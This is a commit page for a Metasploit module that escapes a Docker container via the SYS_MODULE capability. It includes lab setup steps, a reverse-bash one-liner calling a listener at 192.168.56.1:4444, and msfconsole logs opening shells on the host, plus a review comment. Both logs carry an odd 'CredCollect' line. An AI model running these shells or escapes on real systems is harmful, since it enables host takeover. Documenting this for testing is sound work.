Land #18519, Docker kernel module escape
smcintyre-r7 committed May 6, 2024
2 parents a048734 + fb62edb commit 47c8d72
Showing 4 changed files with 749 additions and 429 deletions.
@@ -0,0 +1,110 @@
## Vulnerable Application

This module performs a container escape onto the host as the daemon user. It
takes advantage of the SYS_MODULE capability. If that exists and the linux
headers are available to compile on the target, then we can escape onto the host.

### Creating A Testing Environment

- Get a VM that you want to test on (or your own machine)
- Install Docker
- Run a listener (can be anything but this example will make use of the msfconsole `cmd/unix/reverse_bash` payload)
```msf
msf6 > use payload/cmd/unix/reverse_bash
msf6 payload(cmd/unix/reverse_bash) > set lhost vboxnet0
lhost => 192.168.56.1
msf6 payload(cmd/unix/reverse_bash) > generate -f raw
bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118'
msf6 payload(cmd/unix/reverse_bash) > exploit -z
[*] Payload Handler Started as Job 0
msf6 payload(cmd/unix/reverse_bash) >
[*] [2023.11.07-21:28:57] Started reverse TCP handler on 192.168.56.1:4444
```
- Create a privileged container (forwarding port 4444 in this example in order
to use a bind shell from the host. Container must be the same OS as host)
```bash
docker run --rm -it --cap-add SYS_MODULE ubuntu bash -c '0<&118-;exec 118<>/dev/tcp/192.168.56.1/4444;sh <&118 >&118 2>&118'
```
- Inside your session, install the required packages to run. Package manager will differ to OS, for debian as an example
```bash
apt update && apt install -y gcc make kmod linux-headers-$(uname -r)
```

## Verification Steps

1. Start msfconsole
2. Get a session
3. Install required packages into session (line 30)
4. Run `use exploit/linux/local/docker_privileged_container_kernel_escape`
5. Run `set SESSION [session]`
6. Run `check`
7. Run `set PAYLOAD [payload]`
8. Run `exploit`

## Options

### KernelModuleName

The name that the kernel module will be called in the system. The default if no
name is set is "{rand(8)}"

### WritableContainerDir

A directory where we can write files inside the container (default is `/tmp/.{rand(4)}`).
This is needed to drop the payload into the container.

### ReloadKernelModule

Rebuilds and reloads kernel module if its already loaded in case of repeat runs.

## Scenarios

### Container Escape from debian linux with reverse bash

```msf
msf6 > sessions -i 1 -c "apt update && apt install -y gcc make kmod linux-headers-$(uname -r)"
[*] Running 'apt update && apt install -y gcc make kmod linux-headers-$(uname -r)' on shell session 1 (192.168.56.126)
msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 1
session => 1
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check
[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
[*] [2023.11.07-21:42:40] Started reverse TCP handler on 192.168.56.1:4444
[*] [2023.11.07-21:42:42] Creating files...
[*] [2023.11.07-21:42:43] Compiling the kernel module...
[+] [2023.11.07-21:42:43] Kernel module compiled successfully
[*] [2023.11.07-21:42:43] Loading kernel module...
[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.126:60974) at 2023-11-07 21:42:50 -0500
[*] This is CredCollect, I have the conn!
```

### Container Escape from arch linux with meterpreter

```msf
msf6 > sessions -i 2 -c "pacman -Syy --noconfirm gcc glibc make linux-headers"
[*] Running 'pacman -Syy --noconfirm gcc glibc make linux-headers' on shell session 2 (192.168.56.106)
msf6 > use exploit/linux/local/docker_privileged_container_kernel_escape
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set session 2
session => 2
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > set lhost vboxnet0
lhost => vboxnet0
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > check
[*] The target appears to be vulnerable. Inside Docker container and target appears vulnerable
msf6 exploit(linux/local/docker_privileged_container_kernel_escape) > exploit -z
[*] [2023.11.07-21:48:40] Started reverse TCP handler on 192.168.56.1:4444
[*] [2023.11.07-21:48:41] Creating files...
[*] [2023.11.07-21:48:43] Compiling the kernel module...
[+] [2023.11.07-21:48:44] Kernel module compiled successfully
[*] [2023.11.07-21:48:44] Loading kernel module...
[*] [2023.11.07-21:48:44] Sending stage (3045380 bytes) to 192.168.56.106
[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.106:50402) at 2023-11-07 21:48:45 -0500
[*] This is CredCollect, I have the conn!
[*] Session 4 created in the background.
```
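Review bot: the "Create a privileged container" step contradicts its own command: the text says the container forwards port 4444 "in order to use a bind shell from the host", but the `docker run` line passes no `-p` flag and runs the `cmd/unix/reverse_bash` reverse shell generated in the previous step, so nothing is forwarded and nothing binds. Suggest rewording the bullet to say the container calls back to the listener on 192.168.56.1:4444, or dropping the port-forwarding remark. Two smaller points in the same file: step 3 of Verification Steps refers to "line 30", but the apt line it means is the fenced `apt update && apt install -y gcc make kmod linux-headers-$(uname -r)` block, and a hard-coded line number will drift on the next edit, so reference the step by name instead; and in the ReloadKernelModule option "if its already loaded" should read "if it's already loaded". Worth stating in the same bullet that what the module actually needs is headers matching the host kernel (`uname -r` is evaluated inside the container, where it reports the host's kernel), since "Container must be the same OS as host" undersells the real constraint documented by the install command.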
